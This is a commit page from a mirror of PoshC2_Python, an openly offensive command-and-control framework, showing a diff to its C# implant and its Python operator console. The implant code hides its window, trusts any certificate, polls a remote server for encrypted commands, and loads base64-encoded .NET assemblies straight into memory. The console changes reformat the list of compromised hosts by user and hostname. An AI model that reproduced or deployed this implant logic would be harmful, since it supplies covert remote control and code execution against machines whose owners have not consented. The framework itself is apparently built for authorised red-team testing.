infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated try - catch for C# Implant

chunking
benpturner 2018-12-29 00:18:43 +00:00
parent 0bb7b5b7be
commit 71fd04fc84
2 changed files with 10 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
Files/Sharp.cs
View File

@ -30,7 +30,7 @@ public class Program
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates();
try { primer(); } catch {}
try { primer(); } catch { }
Thread.Sleep(300000);
try { primer(); } catch { }
Thread.Sleep(600000);
@ -311,12 +311,12 @@ public class Program
if (killDate < now){
System.Environment.Exit(1);
}
var cmd = GetWebRequest(null).DownloadString(URL);
string output = "";
try {
try {
string cmd = null;
string x = "";
try {
try {
cmd = GetWebRequest(null).DownloadString(URL);
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
@ -329,7 +329,7 @@ public class Program
output = "";
//add download-file
//add upload-file
//add implant-core features, screenshot, tasklist, etc
//add implant-core features, screenshot, etc
if (c.ToLower() == "pwd") {
output = Directory.GetCurrentDirectory();
@ -365,17 +365,11 @@ public class Program
output = stringOutput.ToString();
}
// load and execute assembly in current app domain
if (c.ToLower().StartsWith("loadmodule")){
//var stringOutput = new StringWriter();
//Console.SetOut(stringOutput);
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
//var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
//output = stringOutput.ToString();
}
// list loaded assemblies
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
foreach (var ass in appd)

8
ImplantHandler.py
View File

@ -187,13 +187,13 @@ def startup(printhelp = ""):
now = datetime.now()
nowplus10 = now - timedelta(minutes=10)
nowplus60 = now - timedelta(minutes=59)
sID = "["+str(ID)+"]"
if nowplus60 > LastSeenTime:
print (Colours.RED + "[%s]: Seen:%s | PID:%s | S:%s | %s @ %s (%s) %s" % (ID, LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot))
print (Colours.RED + "%s: Seen:%s | PID:%s | %s | %s @ %s (%s) %s" % (sID.ljust(4), LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot))
elif nowplus10 > LastSeenTime:
print (Colours.YELLOW + "[%s]: Seen:%s | PID:%s | S:%s | %s @ %s (%s) %s" % (ID, LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot))
print (Colours.YELLOW + "%s: Seen:%s | PID:%s | %s | %s @ %s (%s) %s" % (sID.ljust(4), LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot))
else:
print (Colours.GREEN + "[%s]: Seen:%s | PID:%s | S:%s | %s @ %s (%s) %s" % (ID, LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot))
print (Colours.GREEN + "%s: Seen:%s | PID:%s | %s | %s @ %s (%s) %s" % (sID.ljust(4), LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot))
else:
from datetime import datetime, timedelta
now = datetime.now()